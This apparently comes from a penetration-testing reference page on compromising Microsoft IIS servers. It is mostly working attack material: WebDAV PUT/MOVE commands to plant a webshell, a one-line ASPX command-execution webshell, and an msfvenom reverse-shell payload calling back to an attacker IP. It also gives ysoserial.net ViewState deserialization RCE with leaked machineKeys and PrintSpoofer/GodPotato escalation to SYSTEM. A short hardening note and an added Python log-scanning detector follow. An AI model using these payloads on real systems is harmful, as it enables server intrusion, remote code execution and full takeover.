IIS
aka Microsoft IIS, inetpub, aspnet
Microsoft's web server for ASP.NET. web.config holds connection strings and the machineKey (ViewState RCE), short-name (tilde) scanning reveals hidden files, WebDAV lets you PUT a shell, and an app-pool shell with SeImpersonate goes to SYSTEM.
Ports
| Port | Proto | Notes |
|---|---|---|
| 80 | tcp | HTTP |
| 443 | tcp | HTTPS |
Fingerprint
- Server: Microsoft-IIS/<version> header
- X-Powered-By: ASP.NET; .aspx/.asmx extensions
Key files
| Path | Holds | Sensitive |
|---|---|---|
| web.config | connectionStrings + machineKey (validationKey/decryptionKey) | sensitive |
| C:\inetpub\wwwroot\ | web root | |
| C:\inetpub\logs\LogFiles\ | IIS request logs | |
Service users
- IIS APPPOOL\<pool>
- NT AUTHORITY\IUSR
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2017-7269 | WebDAV ScStoragePathFromUrl buffer overflow RCE on IIS 6.0 |
Exploitation primitives
- Short-name (~) scan to reveal hidden .aspx/.zip/.bak files
- WebDAV PUT (or PUT+MOVE) to drop an .aspx webshell
- Leaked machineKey → ViewState deserialization RCE with ysoserial.net
- App-pool shell holds SeImpersonate → PrintSpoofer/GodPotato to SYSTEM
Overview
IIS serves ASP.NET on Windows. The recurring wins: find hidden files by short-name, drop a webshell via WebDAV or an upload, pull web.config for the machineKey to forge a malicious ViewState, and once you’re the app pool, ride SeImpersonate to SYSTEM.
Fingerprint
Confirm IIS and its version:
curl -sI http://<TARGET>/ | grep -i -E 'server|x-powered|x-aspnet'
Short-name (tilde) enumeration
IIS leaks 8.3 short names via the ~ trick, revealing hidden .aspx files, backups and archives even when directory listing is off.
Modern scanner:
shortscan http://<TARGET>/
Classic Java scanner:
java -jar iis_shortname_scanner.jar 2 20 http://<TARGET>/
Then brute the full names from the recovered prefixes:
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -u http://<TARGET>/FUZZ -mc 200
WebDAV
Check whether WebDAV (and PUT) is enabled:
davtest -url http://<TARGET>
nmap -p80 --script http-webdav-scan,http-iis-webdav-vuln <TARGET>
Upload a webshell directly:
curl -X PUT http://<TARGET>/shell.aspx --data-binary @shell.aspx
If .aspx is blocked on PUT, upload as .txt then MOVE it:
curl -X MOVE -H "Destination: http://<TARGET>/shell.aspx" http://<TARGET>/shell.txt
IIS 6.0 only — the WebDAV overflow (CVE-2017-7269):
msf > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
ASPX webshell
A minimal command webshell to drop:
<%@ Page Language="C#" %><% System.Diagnostics.Process.Start("cmd.exe","/c "+Request["c"]); %>
Or a full Meterpreter:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f aspx -o shell.aspx
web.config → ViewState RCE
Read web.config (LFI, short-name hit, or once you have any file read) for the machineKey:
curl -s http://<TARGET>/web.config | grep -i machineKey
With the validationKey + decryptionKey, forge a malicious __VIEWSTATE for RCE (ysoserial.net):
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -e <BASE64_CMD>" --path="/page.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="<DECRYPTIONKEY>" --validationalg="SHA1" --validationkey="<VALIDATIONKEY>"
POST the output as the __VIEWSTATE parameter to the target page. (No machineKey? If the app uses a default/weak key, Blacklist3r can recover it.)
Local privesc (app-pool → SYSTEM)
An IIS shell runs as IIS APPPOOL\<pool>, which holds SeImpersonate — cash it in for SYSTEM (full payloads in Windows Privilege Escalation):
PrintSpoofer.exe -i -c cmd
GodPotato-NET4.exe -cmd "cmd /c whoami"
Hardening
Keep the machineKey secret and unique, disable WebDAV/short-names if unused, run app pools least-privileged (deny SeImpersonate where possible), and patch.
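A defender-side complement to the primitives above, added here and not part of the original page: it parses IIS W3C request logs (the LogFiles path under Key files) and flags tilde short-name probes, WebDAV write methods and web.config reads. The log excerpt and client addresses are constructed.

```python
"""Flag IIS W3C log entries matching the primitives on this page (added example; log lines are constructed,
in the default IIS W3C extended field set)."""
import re

SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-05-01 10:00:01 10.0.0.5 GET /index.aspx - 80 - 198.51.100.7 Mozilla/5.0 - 200 0 0 15
2024-05-01 10:00:02 10.0.0.5 GET /a*~1*/.aspx - 80 - 198.51.100.7 shortscan - 404 0 2 3
2024-05-01 10:00:05 10.0.0.5 PUT /shell.txt - 80 - 198.51.100.7 curl/8.0 - 201 0 0 8
2024-05-01 10:00:06 10.0.0.5 MOVE /shell.txt - 80 - 198.51.100.7 curl/8.0 - 201 0 0 5
2024-05-01 10:00:09 10.0.0.5 GET /web.config - 80 - 198.51.100.7 curl/8.0 - 404 8 0 2
2024-05-01 10:00:10 10.0.0.5 POST /page.aspx - 80 - 203.0.113.9 Mozilla/5.0 - 200 0 0 120
"""

# WebDAV methods that change content; PROPFIND/OPTIONS are read-only and noisy, so not flagged.
WEBDAV_WRITE = {"PUT", "MOVE", "COPY", "MKCOL", "DELETE", "PROPPATCH"}
TILDE_PROBE = re.compile(r"~\d")  # 8.3 short-name probe such as /a*~1*/.aspx


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def classify(entry):
    """Return the detection tags that apply to one parsed request."""
    tags = []
    if TILDE_PROBE.search(entry["cs-uri-stem"] + entry["cs-uri-query"]):
        tags.append("SHORTNAME_SCAN")
    if entry["cs-method"].upper() in WEBDAV_WRITE:
        # A 2xx on a write method means the upload or rename actually succeeded.
        ok = entry["sc-status"].startswith("2")
        tags.append("WEBDAV_WRITE_OK" if ok else "WEBDAV_WRITE")
    if entry["cs-uri-stem"].lower().endswith(".config"):
        tags.append("CONFIG_READ")
    return tags


def scan(text):
    """Return (client ip, method, uri, status, tags) for every flagged request."""
    return [(e["c-ip"], e["cs-method"], e["cs-uri-stem"], e["sc-status"], t)
            for e in parse_w3c(text) if (t := classify(e))]
```

Run `scan()` over a real `u_ex*.log` from C:\inetpub\logs\LogFiles\ and group the findings by client address; a single host tripping all three rules in a few seconds is the pattern the sections above produce.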